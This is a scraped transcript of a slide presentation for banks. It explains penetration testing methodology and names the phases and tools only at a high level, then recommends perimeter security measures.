1 / 30

Penetration Testing The Importance of Your Bank’s Perimeter Security

Penetration Testing The Importance of Your Bank’s Perimeter Security Presented by: Brian Hunter & Philip Diekhoff BKD Risk Management Group A Brief History of Hacking The Penetration Tester Testing done by an Ethical Hacker who attempts to circumvent security of computer system or network

jaden
Télécharger la présentation

Penetration Testing The Importance of Your Bank’s Perimeter Security

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Penetration TestingThe Importance of Your Bank’s Perimeter Security Presented by: Brian Hunter & Philip Diekhoff BKD Risk Management Group

  2. A Brief History of Hacking

  3. The Penetration Tester • Testing done by an Ethical Hacker who attempts to circumvent security of computer system or network • EH works under no constraints other than those that would apply to ordinary users • EH will use same methodology & tools used by Hackers

  4. Types of Penetration Testing • External Penetration Testing • Taking role of hacker to gain access from Internet • Internal Penetration Testing • Taking on role of disgruntled employee or third-party vendor to gain access from inside network

  5. Different types of Penetration Testing What kinds of testing can be done? • No knowledge –hacker from Internet. Test is performed with no information about organization • Knowledgeable –former employee. Test is performed with some knowledge but no access • Insider –consultants or vendors. Test is performed inside with physical access to network. Knowledge is limited • Knowledgeable insider –staff. Test is performed inside with knowledge. This is to test how secure network is & whether employees can access resources they shouldn’t be able to

  6. Security Offerings – What’s out there? • Network Scanning • Vulnerability Scanning • Penetration Testing What is the difference?

  7. What is it? Uses port scanners (ex. Nmap, Superscan) Scans network to determine what devices are there, what ports are open & what services are running on those ports Fast, efficient but doesn’t probe for vulnerabilities Network Scanning

  8. Vulnerability Scanning What is it? • Identifies network hosts & services • Identifies network operating systems • Identifies applications running on those devices • Identifies potential vulnerabilities pertinent to those systems & applications • Based on a database of vulnerabilities & not actual testing • Fairly fast, provides list of vulnerabilities but has many false positives

  9. Penetration Testing What is it? • Set of procedures designed to circumvent existing security controls of specific system or organization • Encompasses network scanning & vulnerability scanning, but includes human element & verification of vulnerabilities • True hacker approach, verifies vulnerabilities but takes time & expertise

  10. Why do I Need Penetration Testing? • Risk assessment • Verification of security controls • Identify vulnerabilities • Regulatory compliance • Anticipate expenditure

  11. It Won’t Happen to Me • No one would be interested in small organization like us • They think IT department has everything under control or • People become complacent with their network Consider This!

  12. Check This Out • http://www.privacyrights.org/ar/ChronDataBreaches.htm • Hacked Sites

  13. Data Breaches 2006: Analysis

  14. Questions to Ask • What is their methodology? • Is methodology proven, has it been successfully used before? • Ask for references—more is better! • How long have they been performing this kind of work?

  15. Things to Keep in Mind • Need for independence • Testing of any type can be disruptive & damaging • Are we talking about network scanning, vulnerability scanning or penetration testing – compare scopes & methodologies • There is no one standard methodology for penetration testing, but there has been some standardizations

  16. Key Methodology Steps • Scope of work/engagement letter • Footprinting • Scanning • Enumeration • Penetration • Privilege escalation • Find sensitive data • Conference with client (discuss findings) • Report (contains findings & recommendations)

  17. Footprinting • Public information gathering to determine organization’s demographics, locations, address, hosts, etc. • Organizational reconnaissance • Network reconnaissance • Domain names • IP addresses • Pinpoint servers (web, email, DNS, etc.) • Employee information • Search newsgroups for company information

  18. Scanning • Assess & identify listening services to focus attack on most promising avenues of entry • TCP and UDP port scanning • Locate publicly accessible devices on IP segment • Identify open ports on devices • Stealth is required not to alert Intrusion Detection Systems

  19. Enumeration • Enumerate network devices & determine what is running & what it is running on • Identify hardware • Identify operating system • Identify services & their version • Identify applications • Identify potential vulnerability

  20. Penetration • Use information from previous steps to gain access to systems. • Using all information gathered so far, prioritize targets by the severity of vulnerabilities found • Systematically address all potential vulnerabilities on all systems • Never perform Denial of Service (DoS) attacks • Demo: RPC Exploit

  21. Privilege Escalation • Depending on privilege level obtained from penetration phase, it may be necessary to attempt to increase privilege level to gain total control of system • Demo: RPC Exploit • Demo: PWDump • Demo: File

  22. Find Sensitive Data – a.k.a. Pilfer • Footprint & scan internal network • Identify internal servers & their purpose • Attempt to locate sensitive information • Crack password files • Databases • Accounting programs • Demo: LC4

  23. Exit Meeting • Meet & discuss findings • Address largest security findings so you may begin immediately fixing them • Get all your questions answered

  24. Report • The real value in penetration testing is in the report • It should identify vulnerabilities • It should give recommendations on fixing those vulnerabilities

  25. What Will it Take to Keep Me Out? Not as much as you might think • New expensive equipment is not usually required • Most security issues can be addressed quickly & easily • Most time & energy will be spent on security awareness

  26. What Will it Take to Keep Me Out? (cont.) • Understand that risks are real • Be proactive with your IT security • Clear, concise policies that define security requirements & expectations of employees • Patches – keep all computers & network devices current with latest service packs, patches and updates

  27. What Will it Take to Keep Me Out? (cont.) • Configure routers & firewalls to block all unnecessary traffic • Develop an “Incident Response Team” • Have testing performed regularly • Use intrusion detection systems • Remember, all testing/scanning is snapshot of network at that point in time

  28. Common Entry Points When locking down your network, pay attention to most common points of entry for hackers • Misconfigured routers • Misconfigured firewalls • Misconfigured Internet servers • Unpatched software • Unsecured remote access • Accounts with excessive permissions • Weak & easily guessed passwords

  29. Key Take Aways • It is not a matter of “IF” but “WHEN” • Be proactive before you need to be reactive • Understand the importance of the methodology • Retest after significant changes • It’s a process not a destination

  30. How to Contact Us Brian Hunter Supervising Consultant Springfield, MO 417.865.8701 bdhunter@bkd.com Philip Diekhoff Senior Consultant Springfield, MO 417.865.8701 pdiekhoff@bkd.com

More Related